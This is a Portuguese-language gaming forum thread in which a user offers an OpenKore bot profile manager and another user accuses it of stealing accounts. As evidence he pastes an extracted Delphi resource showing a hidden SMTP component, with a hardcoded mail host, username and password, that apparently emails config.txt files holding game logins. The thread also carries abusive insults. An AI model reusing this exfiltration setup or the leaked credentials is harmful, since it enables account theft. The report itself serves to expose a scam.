Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Open Kore Tool - Gerenciador de Perfis 1.0

Posts Recomendados

• 2 semanas atrás...
ae galera wc, to colocando aki no fórum a nova versão do gerenciado de perfis

salvando a config.txt, mon_control.txt, pickupitems.txt e com backup de macros

:d

img4bm.jpg

img3bu.jpg

img2mi.png

img1r.png

img5l.jpg

scan virus total

É necessário se cadastrar para acessar o conteúdo.

download via rapidshare.com clique aqui

não caiam nesse truque ontem baixei essa merda e tentei usar sorte q eu add só 1 acc das minhas e hoje amanheci com a acc rackeada por este grande filho bastardo de uma prostituta chinesa!

O fdp me levou 1 jibóia, 1 orelha de demônio e 49kks!

Não usem isso!

Me admira um mmoderador q só sabe dar ban na galera q tem dúvidas não testar os programas q aqui postam! For isso digo q esse forum + os moderadores são amadores!

Este membro o cheater, não passa de um vagabundo sacana!

No mínimo!

Link para o comentário
Compartilhar em outros sites

Escuta aqui seu vacilão, se vc toma hack não venha acusar sem ter provas, verifica o scan ou faça vc mesmo o scan do arquivo o pode comprovar que não tem virus nem nada, agora se vc acha que fui eu q te dei hack, ótimo pra mim que sai com isso ai q vc falo.

Só mais uma observação, o arquivo já foi baixado 57 vezes e vc é o primeiro que reclama de hack, acho que o vacilão baixa tudo que encontra pela frente e agora quer chorar pra cima de qualquer um, isso é foda.

TO TRANQUILÃO:cool:

Link para o comentário

Escuta aqui seu vacilão, se vc toma hack não venha acusar sem ter provas, verifica o scan ou faça vc mesmo o scan do arquivo o pode comprovar que não tem virus nem nada, agora se vc acha que fui eu q te dei hack, ótimo pra mim que sai com isso ai q vc falo.

Só mais uma observação, o arquivo já foi baixado 57 vezes e vc é o primeiro que reclama de hack, acho que o vacilão baixa tudo que encontra pela frente e agora quer chorar pra cima de qualquer um, isso é foda.

TO TRANQUILÃO:cool:

coincidencia q baixei seu programa q naum faz nada absolutamente nada!

um scan feito em delphi

abri ele com o reshack

e encontrei isso aqui:

object DataModule2: TDataModule2

OldCreateOrder = False

Height = 150

Width = 215

object OpenKoreProfiler: TIdSMTP

Host = 'smtps.bol.com.br'

Password = '123456ab'

Port = 587

SASLMechanisms = <>

Username = '[email protected]'

Left = 40

Top = 8

end

object OpenKoreProfile: TIdMessage

AttachmentEncoding = 'UUE'

BccList = <>

CCList = <>

Encoding = meDefault

FromList = <

item

end>

Recipients = <>

ReplyTo = <>

ConvertPreamble = True

Left = 40

Top = 64

end

scan q envia email sósinhu com as config.txt contendo as senhas quando vc aperta o botaum Carregar Perfil selecionado!

agora como vc me explica q a unica acc q eu carreguei foi hackeada?

fico mais piuto com o moderador do forum q naum faz nada!

agora vc Cheater me dis q esse naum é seu email do bol ao qual as config.txt saum enviadas?

liguei p/ lug ele vaum ou rastreraram o ip dos ultimos trades q meu char fez essa madrugada e vaum pegar o seu ip q contem a senha e login da acc q roubou meus itens e zenys.

no total foram 49kk 1 jiboia+1orelha de demonio.

isso pq naum tem a senha da kafra sorte minha e full equips campal. seu podre idiota!

end

Link para o comentário

liguei p/ lug ele vaum ou rastreraram o ip dos ultimos trades q meu char fez essa madrugada e vaum pegar o seu ip q contem a senha e login da acc q roubou meus itens e zenys

Claro, e vc falou para o atendente da lug que pegaram seu login e senha do seu arquivo de bot, claro vc falou q tomou hack pq usa ferramentas de hack, a cara ou vc é muito burro ou é um completo burro.

Link para o comentário

È tava vendo o topico...agora que vi a descoberta do parenty fica muito dificil de alguem ainda abaixar isso...

@topic

Certo parece um gerenciador...mas para que, muitos usuarios mesmo que iniciantes ja conseguem analisar alguns comandos pelo menos do config.txt, mon_control.txt...e se nao sabem pedem ajuda no forum.

e de qualquer forma nao vejo a necessidade desse gerenciador, mas a vontade e a cabeça é de cada um. ;)

By: gui~*

Link para o comentário

Não acredito q nenhujm moderador olhou isso!

:mad: Naum entendo! esse cheaterBR deve ser um dos moderadores! só pode o cara posta um scan de roubar acc nos rag e nada acontece? ta provado eu revelei o programa dele!

e se algum MOD tyem dúvidas q se faça dse inteligente e abra o programa desse filho bastardo de uma prostituta chinesa ai e vejam isso aaqui:

object DataModule2: TDataModule2

OldCreateOrder = False

Height = 150

Width = 215

object OpenKoreProfiler: TIdSMTP

Host = 'smtps.bol.com.br'

Password = '123456ab'

Port = 587

SASLMechanisms = <>

Username = '[email protected]'

Left = 40

Top = 8

end

object OpenKoreProfile: TIdMessage

AttachmentEncoding = 'UUE'

BccList = <>

CCList = <>

Encoding = meDefault

FromList = <

item

end>

Recipients = <>

ReplyTo = <>

ConvertPreamble = True

Left = 40

Top = 64

end

se isso naum é um scam q envia o arquivo em questão ao email ali citado q é o dele.

naum sei mais oq é!

depois q eu postei a senha do email dele aqui ele mudou a senha la

no BOL.

uahsuashuahsa

troxaum!

Link para o comentário

• 3 semanas atrás...

é triste saber q os merda de adm e moderadores deste forum permitem este tipo de coisa!

o miserável do CheaterBR alem de me roubar a acc do bro a qual fui lesado, ainda manda email me casoando!

apesar de todas as provas q eu dei do keyloguer dele, naum foram capazes de banir ele, e nem me dar uma resposta sobre o assunto!

porcos inuteis!

<a href=imagembo.jpg' alt='imagembo.jpg'>

q decepção p/ os usuários deste forum!

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.